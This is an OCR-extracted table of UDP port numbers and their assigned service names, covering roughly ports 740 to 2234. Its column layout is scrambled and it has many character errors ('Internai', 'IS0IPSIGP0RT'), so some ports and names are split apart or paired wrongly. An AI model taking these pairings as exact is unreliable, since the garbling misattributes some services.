IBM NetView DM/6000 


UDP 


1030 


BBN IAD 


receive/tcp 


UDP 


1031 


BBN IAD 


UDP 


740 


(old) NETscout Control 


UDP 


1032 


BBN IAD 


Protocol 


(old) 


UDP 


1047 


Sun 's NEO Object Request 


UDP 


741 


netGW 


Broker 




UDP 


742 


Network based Rev. Cont. Sys . 


UDP 


1048 


Sun 's NEO Object Request 


UDP 


744 


Flexible License Manager 


Broker 




UDP 


747 


Fujitsu Device Control 


UDP 


1049 


Tobit David Postman VPMN 


UDP 


748 


Russell Info Sci Calendar 


UDP 


1050 


CORBA Management Agent 


Manager 




UDP 


1051 


Optima VNET 


UDP 


749 


kerberos administration 


UDP 


1052 


Dynamic DNS Tools 


UDP 


750 


kerberos version iv 


UDP 


1053 


Remote Assistant (RA) 


UDP 


751 


pump 


UDP 


1054 


BRVREAD 


UDP 


752 


Kerberos password server 


UDP 


1055 


ANSYS — License Manager 


UDP 


753 


Kerberos userreg server 


UDP 


1056 


VFO 


UDP 


754 


send 


UDP 


1057 


STARTRON 


UDP 


758 


nlogin 


UDP 


1058 


nim 


UDP 


759 


con 


UDP 


1059 


nimreg 


UDP 


760 


ns 


UDP 


1060 


POLESTAR 


UDP 


761 


rxe 


UDP 


1061 


KIOSK 


UDP 


762 


quo t ad 


UDP 


1062 


Veracity 


UDP 


763 


cycleserv 


UDP 


1063 


KyoceraNetDev 


UDP 


764 


omserv 


UDP 


1064 


JSTEL 


UDP 


765 


webster 


UDP 


1065 


SYSCOMLAN 


UDP 


767 


phone 


UDP 


1066 


FPO-FNS 


UDP 


769 


vid 


UDP 


1067 


Installation Bootstrap 


UDP 


770 


cadlock 


Proto. Serv. 


UDP 


771 


rtip 


UDP 


1068 


Installation Bootstrap 


UDP 


772 


cycleserv2 


Proto. CU. 


UDP 


773 


notify 


UDP 


1069 


COGNEX-INSIGHT 


UDP 


774 


acmaint dbd 


UDP 


1070 


GMRUpdateSERV 


UDP 


775 


acmainttransd 


UDP 


1071 


BSQUARE-VOIP 


UDP 


776 


wpages 


UDP 


1072 


CARDAX 


UDP 


777 


Multiling HTTP 


UDP 


1073 


BridgeControl 


UDP 


780 


wpgs 


UDP 


1074 


FASTechnologies License 


UDP 


781 


HP performance data collector 


Manager 




UDP 


782 


node HP performance data 


UDP 


1075 


RDRMSHC 


managed node 


UDP 


1076 


DAB STI-C 


UDP 


783 


HP performance data alarm 


UDP 


1077 


IMGames 


manager 




UDP 


1078 


eManageCstp 


UDP 


786 


Concert 


UDP 


1079 


ASPROVATalk 


UDP 


787 


QSC 


UDP 


1080 


Socks 


UDP 


800 


mdbs daemon 


UDP 


1081 


PVUNIWIEN 


UDP 


801 


device 


UDP 


1082 


AMT-ESD-PROT 


UDP 


810 


FCP Datagram 


UDP 


1083 


Anasoft License Manager 


UDP 


828 


itm—mcell—s 


UDP 


1084 


Anasoft License Manager 
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UDP 


1085 


Web Objects 


UDP 


1311 


RxMon 


UDP 


1086 


CPL Scrambler Logging 


UDP 


1312 


STI Envision 


UDP 


1087 


CPL Scrambler Internai 


UDP 


1313 


BMC_PATROLDB 


UDP 


1088 


CPL Scrambler Alarm Log 


UDP 


1314 


Photoscript Distributed 


UDP 


1089 


FF Annunciation 


Printing System 


UDP 


1090 


FF Fieldbus Message 


UDP 


1319 


Panja-ICSP 


Speci fication 


UDP 


1320 


Panja-AXBNET 


UDP 


1091 


FF System Management 


UDP 


1321 


PIP 


UDP 


1092 


OBRPD 


UDP 


1335 


Digital Notary Protocol 


UDP 


1093 


PROOFD 


UDP 


1345 


VPJP 


UDP 


1094 


ROOTD 


UDP 


1346 


Alta Analytics License 


UDP 


1095 


NICELink 


Manager 




UDP 


1096 


Common Name Resolution 


UDP 


1347 


multi media conferencing 


Protocol 




UDP 


1348 


multi media conferencing 


UDP 


1097 


Sun Cluster Manager 


UDP 


1349 


Registration Network 


UDP 


1098 


RMI Activation 


Protocol 




UDP 


1099 


RMI Registry 


UDP 


1350 


Registration Network 


UDP 


1100 


MCTP 


Protocol 




UDP 


1101 


PT2—DISC0VER 


UDP 


1351 


Digital Tool Works (MIT) 


UDP 


1102 


ADOBE SERVER 1 


UDP 


1352 


Lotus Note 


UDP 


1103 


ADOBE SERVER 2 


UDP 


1353 


Relief Consulting 


UDP 


1104 


XRL 


UDP 


1354 


RightBrain Software 


UDP 


1105 


FTRANHC 


UDP 


1355 


Intuitive Edge 


UDP 


1106 


IS0IPSIGP0RT-1 


UDP 


1356 


CuillaMartin Company 


UDP 


1107 


IS0IPSIGP0RT-2 


UDP 


1357 


Electronic PegBoard 


UDP 


1108 


ratio-adp 


UDP 


1358 


CONNLCLI 


UDP 


1110 


Client status info 


UDP 


1359 


FTSRV 


UDP 


1111 


LM Social Server 


UDP 


1360 


MIMER 


UDP 


1112 


Intelligent Communication 


UDP 


1361 


LinX 


Protocol 




UDP 


1362 


TimeFlies 


UDP 


1114 


Mini SQL 


UDP 


1363 


Network DataMover Requester 


UDP 


1115 


ARDUS Transfer 


UDP 


1364 


Network DataMover Server 


UDP 


1116 


ARDUS Control 


UDP 


1365 


Network Software Associates 


UDP 


1117 


ARDUS Multicast Transfer 


UDP 


1366 


Novell NetWare Comm Service 


UDP 


1123 


Murray 


Platform 




UDP 


1155 


Network File Access 


UDP 


1367 


DCS 


UDP 


1161 


Health Polling 


UDP 


1368 


ScreenCast 


UDP 


1162 


Health Trap 


UDP 


1369 


GlobalView to Unix Shell 


UDP 


1167 


conference calling 


UDP 


1370 


Unix Shell to GlobalView 


UDP 


1169 


TRIPWIRE 


UDP 


1371 


Fujitsu Config Protocol 


UDP 


1180 


Millicent Client Proxy 


UDP 


1372 


Fujitsu Config Protocol 


UDP 


1188 


HP Web Admin 


UDP 


1373 


Chromagrafx 


UDP 


1200 


SCOL 


UDP 


1374 


EPI Software Systems 


UDP 


1201 


Nucleus Sand 


UDP 


1375 


Bytex 


UDP 


1202 


caiccipc 


UDP 


1376 


IBM Person to Person 


UDP 


1203 


License Validation 


Software 




UDP 


1204 


Log Request Listener 


UDP 


1377 


Cichlid License Manager 


UDP 


1205 


Accord-MGC 


UDP 


1378 


Elan License Manager 


UDP 


1206 


Anthony Data 


UDP 


1379 


Integrity Solutions 


UDP 


1207 


MetaSage 


UDP 


1380 


Telesis Network License 


UDP 


1208 


SEAGULL AIS 


Manager 




UDP 


1209 


IPCD3 


UDP 


1381 


Apple Network License 


UDP 


1210 


EOSS 


Manager 




UDP 


1211 


Groove DPP 


UDP 


1382 


udt_os 


UDP 


1212 


lupa 


UDP 


1383 


GW Hannaway Network License 


UDP 


1213 


MPC LIFENET 


Manager 




UDP 


1214 


KAZAA 


UDP 


1384 


Objective Solutions License 


UDP 


1215 


scanSTAT 1 . 0 


Manager 




UDP 


1216 


ETEBAC 5 


UDP 


1385 


Atex Publishing License 


UDP 


1217 


HPSS-NDAPI 


Manager 




UDP 


1218 


AeroFl ight -ADs 


UDP 


1386 


CheckSum License Manager 


UDP 


1219 


AeroFlight-Ret 


UDP 


1387 


Computer Aided Design 


UDP 


1220 


QT SERVER ADMIN 


Software Ine LM 


UDP 


1221 


SweetWARE Apps 


UDP 


1388 


Objective Solutions DataBase 


UDP 


1222 


SNI R&D network 


Cache 




UDP 


1223 


TGP 


UDP 


1389 


Document Manager 


UDP 


1224 


VPNz 


UDP 


1390 


Storage Controller 


UDP 


1225 


SLINKYSEARCH 


UDP 


1391 


Storage Access Server 


UDP 


1226 


STGXFWS 


UDP 


1392 


Print Manager 


UDP 


1227 


DNS2GO 


UDP 


1393 


Network Log Server 


UDP 


1228 


FLORENCE 


UDP 


1394 


Network Log Client 


UDP 


1229 


Novell ZFS 


UDP 


1395 


PC Workstation Manager 


UDP 


1234 


Infoseek Search Agent 


software 




UDP 


1239 


NMSD 


UDP 


1396 


DVL Active Mail 


UDP 


1248 


hermes 


UDP 


1397 


Audio Active Mail 


UDP 


1300 


H323 Host Cali Secure 


UDP 


1398 


Video Active Mail 


UDP 


1310 


Husky 


UDP 


1399 


Cadkey License Manager 
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UDP 1400 Cadkey Tablet Daemon 

UDP 1401 Goldleaf License Manager 

UDP 1402 Prospero Resource Manager 

UDP 1403 Prospero Resource Manager 

UDP 1404 Infinite Graphics License 
Manager 

UDP 1405 IBM Remote Execution Starter 

UDP 1406 NetLabs License Manager 

UDP 1407 DBSA License Manager 

UDP 1408 Sophia License Manager 

UDP 1409 Here License Manager 

UDP 1410 HiQ License Manager 

UDP 1411 AudioFile 

UDP 1412 InnoSys 

UDP 1413 Innosys-ACL 

UDP 1414 IBM MQSeries 

UDP 1415 DBStar 

UDP 1416 Novell LU6.2 

UDP 1417 Timbuktu Service 1 Port 

UDP 1418 Timbuktu Service 2 Port 

UDP 1419 Timbuktu Service 3 Port 

UDP 1420 Timbuktu Service 4 Port 

UDP 1421 Gandalf License Manager 

UDP 1422 Autodesk License Manager 

UDP 1423 Es sbase Arbor Software 

UDP 1424 Hybrid Encryption Protocol 

UDP 1425 Zion Software License 

Manager 

UDP 1426 Satellite-data Acquisition 
System 1 

UDP 1427 mloadd monitoring tool 

UDP 1428 Informatik License Manager 

UDP 1429 Hypercom NMS 

UDP 1430 Hypercom TPDU 

UDP 1431 Reverse Gossip Transport 

UDP 1432 Blueberry Software License 

Manager 

UDP 1433 Microsoft-SQL-Server 

UDP 1434 Microsoft-SQL-Monitor 

UDP 1435 IBM CICS 

UDP 1436 Satellite— data Acquisition 
System 2 

UDP 1437 Tabula 

UDP 1438 Eicon Security Agent/Server 

UDP 1439 Eicon X25/SNA Gateway 

UDP 1440 Eicon Service Location 
Protocol 

UDP 1441 Cadis License Management 

UDP 1442 Cadis License Management 

UDP 1443 Integrated Engineering 
Software 

UDP 1444 Marcam License Management 

UDP 1445 Proxima License Manager 

UDP 1446 Optical Research Associates 
License Manager 

UDP 1447 Applied Parallel Research LM 

UDP 1448 OpenConnect License Manager 

UDP 1449 PEport 

UDP 1450 Tandem Distributed Workbench 
Facility 

UDP 1451 IBM Information Management 

UDP 1452 GTE Government Systems 
License Man 

UDP 1453 Genie License Manager 

UDP 1454 interHDL License Manager 

UDP 1455 ESL License Manager 

UDP 1456 DCA 

UDP 1457 Valisys License Manager 

UDP 1458 Nichols Research Corp. 

UDP 1459 Proshare Notebook 
Application 

UDP 1460 Proshare Notebook 
Appi ication 

UDP 1461 IBM Wireless LAN 

UDP 1462 World License Manager 

UDP 1463 Nucleus 

UDP 1464 MSL License Manager 



UDP 1465 Pipes Platform 

mfarlin@peerlogic. com 

UDP 1466 Ocean Software License 

Manager 

UDP 1467 CSDMBASE 

UDP 1468 CSDM 

UDP 1469 Active Analysis Limited 

License Manager 

UDP 1470 Universal Analytics 

UDP 1471 csdmbase 

UDP 1472 csdm 

UDP 1473 OpenMath 

UDP 1474 Telefinder 

UDP 1475 Taligent License Manager 

UDP 1476 clvm-cfg 

UDP 1477 ms—sna— server 

UDP 1478 ms-sna-base 

UDP 1479 dberegister 

UDP 1480 PacerForum 

UDP 1481 AIRS 

UDP 1482 Miteksys License Manager 

UDP 1483 AFS License Manager 

UDP 1484 Confluent License Manager 

UDP 1485 LANSource 

UDP 1486 nms_topo_serv 

UDP 1487 LocalInfoSrvr 

UDP 1488 DocStor 

UDP 1489 dmdocbroker 

UDP 1490 insitu-conf 

UDP 1491 anynetgateway 

UDP 1492 stone-design-1 

UDP 1493 netmap_lm 

UDP 1494 ica 

UDP 1495 cvc 

UDP 1496 liberty-lm 

UDP 1497 rfx-lm 

UDP 1498 Sybase SQL Any 

UDP 1499 Federico Heinz Consultora 

UDP 1500 VLSI License Manager 

UDP 1501 Satellite-data Acquisition 

System 3 

UDP 1502 Shiva 

UDP 1503 Databeam 

UDP 1504 EVB Software Engineering 

License Manager 

UDP 1505 Punk Software Inc. 

UDP 1506 Universal Time daemon (utcd) 

UDP 1507 symplex 

UDP 1508 diagmond 

UDP 1509 Robcad Ltd. License Manager 

UDP 1510 Midland Valley Exploration 

Ltd. Lic. Man. 

UDP 1511 31-11 

UDP 1512 Microsoft 's Windows Internet 

Name Service 

UDP 1513 Fujitsu Systems Business of 
America Ine 

UDP 1514 Fujitsu Systems Business of 
America Ine 

UDP 1515 if or-protocol 

UDP 1516 Virtual Places Audio data 

UDP 1517 Virtual Places Audio control 

UDP 1518 Virtual Places Video data 

UDP 1519 Virtual Places Video control 

UDP 1520 atm zip office 

UDP 1521 nCube License Manager 

UDP 1522 Ricardo North America 

License Manager 

UDP 1523 cichild 

UDP 1524 ingres 

UDP 1525 Prospero Directory Service 
non—priv 

UDP 1526 Prospero Data Access Prot 
non—priv 

UDP 1527 oracle 

UDP 1528 micautoreg 

UDP 1529 oracle 
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UDP 


1530 


rap-service 


UDP 


1605 


Salutation Manager 


UDP 


1531 


rap-listen 


(Salutation Protocol) 


UDP 


1532 


miroconnect 


UDP 


1606 


Salutation Manager (SLM-API) 


UDP 


1533 


Virtual Places Software 


UDP 


1607 


stt 


UDP 


1534 


mi cromu se-lm 


UDP 


1608 


Smart Corp. License Manager 


UDP 


1535 


ampr—info 


UDP 


1609 


isysg-lm 


UDP 


1536 


ampr—inter 


UDP 


1610 


taurus-wh 


UDP 


1537 


isi—lm 


UDP 


1611 


Inter Library Loan 


UDP 


1538 


3ds-lm 


UDP 


1612 


NetBill Transaction Server 


UDP 


1539 


Intellistor License Manager 


UDP 


1613 


NetBill Key Repository 


UDP 


1540 


rds 


UDP 


1614 


NetBill Credential Server 


UDP 


1541 


rds2 


UDP 


1615 


NetBill Authorization Server 


UDP 


1542 


gridgen-elmd 


UDP 


1616 


NetBill Product Server 


UDP 


1543 


simba-cs 


UDP 


1617 


Nimrod Inter— Agent 


UDP 


1544 


aspeclmd 


Communication 


UDP 


1545 


vistium—share 


UDP 


1618 


skytelnet 


UDP 


1546 


abbaccuray 


UDP 


1619 


xs-openstorage 


UDP 


1547 


laplink 


UDP 


1620 


faxport winport 


UDP 


1548 


Axon License Manager 


UDP 


1621 


softdataphone 


UDP 


1549 


Shiva Sound 


UDP 


1622 


ontime 


UDP 


1550 


Image Storage license 


UDP 


1623 


jaleosnd 


manager 3M Company 


UDP 


1624 


udp-sr-port 


UDP 


1551 


HECMTL—DB 


UDP 


1625 


svs-omagent 


UDP 


1552 


pciarray 


UDP 


1626 


Shockwave 


UDP 


1553 


sna-cs 


UDP 


1627 


1.128 Gateway 


UDP 


1554 


CACI Products Company 


UDP 


1628 


LonTalk normal 


License Manager 


UDP 


1629 


LonTalk urgent 


UDP 


1555 


livelan 


UDP 


1630 


Oracle Net 8 Cman 


UDP 


1556 


AshWin CI Tecnologies 


UDP 


1631 


Visit view 


UDP 


1557 


ArborText License Manager 


UDP 


1632 


PAMMRATC 


UDP 


1558 


xingmpeg 


UDP 


1633 


PAMMRPC 


UDP 


1559 


web2host 


UDP 


1634 


Log On America Probe 


UDP 


1560 


asci-vai 


UDP 


1635 


EDB Server 1 


UDP 


1561 


facilityview 


UDP 


1636 


CableNet Control Protocol 


UDP 


1562 


pconnectmgr 


UDP 


1637 


CableNet Admin Protocol 


UDP 


1563 


Cadabra License Manager 


UDP 


1638 


CableNet Info Protocol 


UDP 


1564 


Pay—Per—View 


UDP 


1639 


cert—initiator 


UDP 


1565 


WinDD 


UDP 


1640 


cert -responder 


UDP 


1566 


CORELVIDEO 


UDP 


1641 


InVision 


UDP 


1567 


jlicelmd 


UDP 


1642 


isis—am 


UDP 


1568 


tsspmap 


UDP 


1643 


isis-ambc 


UDP 


1569 


ets 


UDP 


1644 


Satellite-data Acquistion 


UDP 


1570 


orbixd 


Systt 


=ms 4 




UDP 


1571 


Oracle Remote Data Base 


UDP 


1645 


datametrics 


UDP 


1572 


Chipcom License Manager 


UDP 


1646 


sa-msg-port 


UDP 


1573 


itscomm—ns 


UDP 


1647 


rsap 


UDP 


1574 


mvel-lm 


UDP 


1648 


concurrent—lm 


UDP 


1575 


oraclenames 


UDP 


1649 


kermit 


UDP 


1576 


moldflow—lm 


UDP 


1650 


nkd 


UDP 


1577 


hypercube—lm 


UDP 


1651 


shiva__confsrvr 


UDP 


1578 


Jacobus License Manager 


UDP 


1652 


xnmp 


UDP 


1579 


ioc—sea—lm 


UDP 


1653 


alphatech—lm 


UDP 


1580 


tn-tl-r2 


UDP 


1654 


stargatealerts 


UDP 


1581 


MIL-2045-47001 


UDP 


1655 


dec—mbadmin 


UDP 


1582 


MSIMS 


UDP 


1656 


dec—mbadmin—h 


UDP 


1583 


simbaexpress 


UDP 


1657 


fujitsu-mmpdc 


UDP 


1584 


tn-tl-fd2 


UDP 


1658 


sixnetudr 


UDP 


1585 


intv 


UDP 


1659 


Silicon Grail License 


UDP 


1586 


ibm—abtact 


Manager 




UDP 


1587 


pra elmd 


UDP 


1660 


skip—mc—gikreq 


UDP 


1588 


triquest—lm 


UDP 


1661 


netview—aix—1 


UDP 


1589 


VQP 


UDP 


1662 


netview—aix—2 


UDP 


1590 


gemini— lm 


UDP 


1663 


netview—aix—3 


UDP 


1591 


ncpm—pm 


UDP 


1664 


netview—aix—4 


UDP 


1592 


commonspace 


UDP 


1665 


netview—aix—5 


UDP 


1593 


mainsoft—lm 


UDP 


1666 


netview—aix—6 


UDP 


1594 


sixtrak 


UDP 


1667 


netview—aix—7 


UDP 


1595 


radio 


UDP 


1668 


netview—aix—8 


UDP 


1596 


radio— bc 


UDP 


1669 


netview—aix—9 


UDP 


1597 


orbplus-iiop 


UDP 


1670 


netview—aix—10 


UDP 


1598 


picknfs 


UDP 


1671 


netview—aix—11 


UDP 


1599 


simbaservi ces 


UDP 


1672 


netview—aix—12 


UDP 


1600 


issd 


UDP 


1673 


Intel Proshare Multicast 


UDP 


1601 


aas 


UDP 


1674 


Intel Proshare Multicast 


UDP 


1602 


inspect 


UDP 


1675 


Pacific Data Products 


UDP 


1603 


pickodbc 


UDP 


1676 


netcomm2 


UDP 


1604 


icabrowser 


UDP 


1677 


groupwise 
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UDP 


1678 


prolink 


UDP 


1751 


SwiftNet 


UDP 


1679 


darcorp—lm 


UDP 


1752 


Leap of Faith Research 


UDP 


1680 


mi crocom—sbp 


License Manager 


UDP 


1681 


sd-elmd 


UDP 


1753 


Translogic License Manager 


UDP 


1682 


lanyon—lantern 


UDP 


1754 


oracle—em2 


UDP 


1683 


ncpm—hip 


UDP 


1755 


ms— streaming 


UDP 


1684 


SnareSecure 


UDP 


1756 


capfast-lmd 


UDP 


1685 


n2nremote 


UDP 


1757 


cnhrp 


UDP 


1686 


cvmon 


UDP 


1758 


tftp-mcast 


UDP 


1687 


nsjtp-ctrl 


UDP 


1759 


SPSS License Manager 


UDP 


1688 


nsjtp-data 


UDP 


1760 


www— Idap-gw 


UDP 


1689 


firefox 


UDP 


1761 


cft-0 


UDP 


1690 


ng-umds 


UDP 


1762 


cft-1 


UDP 


1691 


empi re-empuma 


UDP 


1763 


cft-2 


UDP 


1692 


sstsys-lm 


UDP 


1764 


cft-3 


UDP 


1693 


rrirtr 


UDP 


1765 


cft-4 


UDP 


1694 


rrimwm 


UDP 


1766 


cft-5 


UDP 


1695 


rrilwm 


UDP 


1767 


cft-6 


UDP 


1696 


rrifmm 


UDP 


1768 


cft-7 


UDP 


1697 


rrisat 


UDP 


1769 


bmc-net—adm 


UDP 


1698 


RSVP-ENCAPSULATION-1 


UDP 


1770 


bmc—net -svc 


UDP 


1699 


RSVP-ENCAPSULATION-2 


UDP 


1771 


vaultbase 


UDP 


1700 


mps-raft 


UDP 


1772 


EssWeb Gateway 


UDP 


1701 


12tp 


UDP 


1773 


KMSControl 


UDP 


1702 


deskshare 


UDP 


1774 


global-dtserv 


UDP 


1703 


hb—engine 


UDP 


1776 


Federai Emergency Management 


UDP 


1704 


bcs-broker 


Information System 


UDP 


1705 


slingshot 


UDP 


1777 


powerguardian 


UDP 


1706 


jetform 


UDP 


1778 


prodigy-internet 


UDP 


1707 


vdmplay 


UDP 


1779 


pharmasoft 


UDP 


1708 


gat-lmd 


UDP 


1780 


dpkeyserv 


UDP 


1709 


centra 


UDP 


1781 


answersoft—lm 


UDP 


1710 


impera 


UDP 


1782 


hp—hcip 


UDP 


1711 


pptconference 


UDP 


1783 


Port 04/14/00 fujitsu.co.jp 


UDP 


1712 


resource monitoring service 


UDP 


1784 


Finle License Manager 


UDP 


1713 


ConferenceTalk 


UDP 


1785 


Wind River Systems License 


UDP 


1714 


sesi-lm 


Manager 




UDP 


1715 


houdini—lm 


UDP 


1786 


funk-logger 


UDP 


1716 


xmsg 


UDP 


1787 


funk— license 


UDP 


1717 


fj-hdnet 


UDP 


1788 


psmond 


UDP 


1718 


h323gatedisc 


UDP 


1789 


hello 


UDP 


1719 


h323gatestat 


UDP 


1790 


Narrative Media Streaming 


UDP 


1720 


h323hostcall 


Protocol 




UDP 


1721 


caicci 


UDP 


1791 


EA1 


UDP 


1722 


HKS License Manager 


UDP 


1792 


ibm-dt-2 


UDP 


1723 


pptp 


UDP 


1793 


rsc-robot 


UDP 


1724 


csbphonemaster 


UDP 


1794 


cera-bcm 


UDP 


1725 


iden-ralp 


UDP 


1795 


dpi-proxy 


UDP 


1726 


IBERIAGAMES 


UDP 


1796 


Vocaltec Server 


UDP 


1727 


winddx 


Administration 


UDP 


1728 


TELINDUS 


UDP 


1797 


UMA 


UDP 


1729 


CityNL License Management 


UDP 


1798 


Event Transfer Protocol 


UDP 


1730 


roketz 


UDP 


1799 


NETRISK 


UDP 


1731 


MSICCP 


UDP 


1800 


ANSYS-License manager 


UDP 


1732 


proxim 


UDP 


1801 


Microsoft Message Que 


UDP 


1733 


SIMS - SIIPAT Protocol for 


UDP 


1802 


ConCompl 


Alarm Transmlssion 


UDP 


1803 


HP-HCIP-GWY 


UDP 


1734 


Camber Corporation License 


UDP 


1804 


ENL 


Management 




UDP 


1805 


ENL-Name 


UDP 


1735 


PrivateChat 


UDP 


1806 


Musiconline 


UDP 


1736 


Street— stream 


UDP 


1807 


Fujitsu Hot Standby Protocol 


UDP 


1737 


ultimad 


UDP 


1808 


0racle-VP2 


UDP 


1738 


GameGenl 


UDP 


1809 


Oracle-VPl 


UDP 


1739 


webaccess 


UDP 


1810 


Jerand License Manager 


UDP 


1740 


encore 


UDP 


1811 


Scientia-SDB 


UDP 


1741 


cisco—net—mgmt 


UDP 


1812 


RADIUS 


UDP 


1742 


3Com—nsd 


UDP 


1813 


RADIUS Account ing 


UDP 


1743 


Cinema Graphics License 


UDP 


1814 


TDP Suite 


Manager 




UDP 


1815 


MMPFT 


UDP 


1744 


ncpm—ft 


UDP 


1816 


HARP 


UDP 


1745 


remote- winsock 


UDP 


1817 


RKB-OSCS 


UDP 


1746 


ftrapid—1 


UDP 


1818 


Enhanced Trivial File 


UDP 


1747 


ftrapid-2 


Transfer Protocol 


UDP 


1748 


oracle—eml 


UDP 


1819 


Plato License Manager 


UDP 


1749 


aspen— services 


UDP 


1820 


mcagent 


UDP 


1750 


Simple Socket Library 's 


UDP 


1821 


donnyworld 


PortMaster 




UDP 


1822 


es-elmd 
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UDP 


1823 


Unisys Naturai Language 


UDP 


1947 


hlserver 


License Manager 


UDP 


1948 


eye2eye 


UDP 


1824 


metrics-pas 


UDP 


1949 


ISMA Easdaq Live 


UDP 


1825 


DirecPC Video 


UDP 


1950 


ISMA Easdaq Test 


UDP 


1826 


ARDT 


UDP 


1951 


bcs—lmserver 


UDP 


1827 


ASI 


UDP 


1952 


mpnjsc 


UDP 


1828 


itm—mcell—u 


UDP 


1953 


Rapid Base 


UDP 


1829 


Optika eMedia 


UDP 


1961 


BTS APPSERVER 


UDP 


1830 


Oracle Net 8 CMan Admin 


UDP 


1962 


BIAP-MP 


UDP 


1831 


Myrtle 


UDP 


1963 


WebMachine 


UDP 


1832 


ThoughtTreasure 


UDP 


1964 


SOLID E ENGINE 


UDP 


1833 


udpradio 


UDP 


1965 


Tivoli NPM 


UDP 


1834 


ARDUS Unicast 


UDP 


1966 


Slush 


UDP 


1835 


ARDUS Multicast 


UDP 


1967 


SNS Quote 


UDP 


1836 


ste-smsc 


UDP 


1972 


Cache 


UDP 


1837 


csoftl 


UDP 


1973 


Data Link Switching Remote 


UDP 


1838 


TALNET 


Access Protocol 


UDP 


1839 


netopia-vol 


UDP 


1974 


DRP 


UDP 


1840 


netopia-vo2 


UDP 


1975 


TCO Flash Agent 


UDP 


1841 


netopia-vo3 


UDP 


1976 


TCO Reg Agent 


UDP 


1842 


netopia-vo4 


UDP 


1977 


TCO Address Book 


UDP 


1843 


netopia-vo5 


UDP 


1978 


UniSQL 


UDP 


1844 


Di re cPC-DLL 


UDP 


1979 


UniSQL Java 


UDP 


1850 


GSI 


UDP 


1984 


BB 


UDP 


1851 


et ed 


UDP 


1985 


Hot Standby Router Protocol 


UDP 


1860 


SunSCALAR Services 


UDP 


1986 


cisco license management 


UDP 


1861 


LeCroy VICP 


UDP 


1987 


cisco RSRB Priority 1 port 


UDP 


1862 


techra-server 


UDP 


1988 


cisco RSRB Priority 2 port 


UDP 


1863 


MSNP 


UDP 


1989 


MHSnet system 


UDP 


1864 


Paradym 31 Port 


UDP 


1990 


cisco STUN Priority 1 port 


UDP 


1865 


ENTP 


UDP 


1991 


cisco STUN Priority 2 port 


UDP 


1870 


SunSCALAR DNS Service 


UDP 


1992 


IPsendmsg 


UDP 


1871 


Cano Central 0 


UDP 


1993 


cisco SNMP TCP port 


UDP 


1872 


Cano Central 1 


UDP 


1994 


cisco serial tunnel port 


UDP 


1873 


Fjmpjps 


UDP 


1995 


cisco perf port 


UDP 


1874 


Fjswapsnp 


UDP 


1996 


cisco Remote SRB port 


UDP 


1881 


IBM MQSeries 


UDP 


1997 


cisco Gateway Discovery 


UDP 


1895 


Vista 4GL 


Protocol 




UDP 


1899 


MC2Studios 


UDP 


1998 


cisco X.25 service (XOT) 


UDP 


1900 


UPnP SSDP 


UDP 


1999 


cisco Identification port 


UDP 


1901 


Fujitsu ICL Terminal 


UDP 


2000 


callbook 


Emulator Program A 


UDP 


2001 


curry 


UDP 


1902 


Fujitsu ICL Terminal 


UDP 


2002 


globe 


Emulator Program B 


UDP 


2004 


CCWS mm conf 


UDP 


1903 


Locai Link Name Resolution 


UDP 


2005 


oracle 


UDP 


1904 


Fujitsu ICL Terminal 


UDP 


2006 


raid 


Emulator Program C 


UDP 


2007 


raid—am 


UDP 


1905 


Secure UP.Link Gateway 


UDP 


2008 


terminaldb 


Protocol 




UDP 


2009 


whosockami 


UDP 


1906 


TPortMapperReq 


UDP 


2010 


pipe— server 


UDP 


1907 


IntraSTAR 


UDP 


2011 


servserv 


UDP 


1908 


Dawn 


UDP 


2012 


raid—ac 


UDP 


1909 


Global World Link 


UDP 


2013 


raid— ed 


UDP 


1910 


ultrabac 


UDP 


2014 


raid—sf 


UDP 


1911 


Starlight Networks 


UDP 


2015 


raid—cs 


Multimedia 


Transport Protocol 


UDP 


2016 


boot server 


UDP 


1912 


rhp—iibp 


UDP 


2017 


boot client 


UDP 


1913 


armadp 


UDP 


2018 


rellpack 


UDP 


1914 


Elm—Momen t um 


UDP 


2019 


about 


UDP 


1915 


FACELINK 


UDP 


2020 


xinupageserver 


UDP 


1916 


Persoft Persona 


UDP 


2021 


xinuexpansionl 


UDP 


1917 


nOAgent 


UDP 


2022 


xinuexpansion2 


UDP 


1918 


Candle Directory Service - 


UDP 


2023 


xinuexpansion3 


NDS 






UDP 


2024 


xinuexpansion4 


UDP 


1919 


Candle Directory Service - 


UDP 


2025 


xribs 


DCH 






UDP 


2026 


scrabble 


UDP 


1920 


Candle Directory Service - 


UDP 


2027 


shadowserver 


FERRET 




UDP 


2028 


submitserver 


UDP 


1921 


NoAdmin 


UDP 


2030 


device2 


UDP 


1922 


Tapestry 


UDP 


2032 


blackboard 


UDP 


1923 


SPICE 


UDP 


2033 


glogger 


UDP 


1924 


XIIP 


UDP 


2034 


scoremgr 


UDP 


1930 


Drive AppServer 


UDP 


2035 


imsldoc 


UDP 


1931 


AMD SCHED 


UDP 


2038 


objectmanager 


UDP 


1944 


dose— combat 


UDP 


2040 


lam 


UDP 


1945 


dialogic-elmd 


UDP 


2041 


interbase 


UDP 


1946 


tekpls 


UDP 


2042 


isis 
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UDP 


2043 


isis-bcast 


UDP 


2148 


VERITAS UNIVERSAL 


UDP 


2044 


rimsl 


COMMUNICATION LAYER 


UDP 


2045 


cdfunc 


UDP 


2149 


ACPTSYS 


UDP 


2046 


sdfunc 


UDP 


2150 


DYNAMIC3D 


UDP 


2047 


dls 


UDP 


2151 


DOCENT 


UDP 


2048 


dls— monitor 


UDP 


2152 


GTP-User Piane (3GPP) 


UDP 


2049 


Network File System - Sun 


UDP 


2165 


X-Bone API 


Microsyste 


ìms 


UDP 


2166 


IWSERVER 


UDP 


2065 


Data Link Switch Read Port 


UDP 


2180 


Millicent Vendor Gateway 


Number 




Server 




UDP 


2067 


Data Link Switch Write Port 


UDP 


2181 


eforward 


Number 




UDP 


2200 


ICI 


UDP 


2090 


Load Report Protocol 


UDP 


2201 


Advanced Training System 


UDP 


2091 


PRP 


Program 




UDP 


2092 


Descent 3 


UDP 


2202 


Int . Multimedia 


UDP 


2093 


NBX CC 


Teleconferencing Cosortium 


UDP 


2094 


NBX AU 


UDP 


2213 


Kali 


UDP 


2095 


NBX SER 


UDP 


2220 


Ganymede 


UDP 


2096 


NBX DIR 


UDP 


2221 


Rockwell CSP1 


UDP 


2097 


Jet Form Preview 


UDP 


2222 


Rockwell CSP2 


UDP 


2098 


Dialog Port 


UDP 


2223 


Rockwell CSP3 


UDP 


2099 


H.225. 0 Annex G 


UDP 


2232 


IVS Video default 


UDP 


2100 


amiganetfs 


UDP 


2233 


INFOCRYPT 


UDP 


2101 


rtcm—scl04 


UDP 


2234 


DirectPlay 


UDP 


2102 


Zephyr server 


UDP 


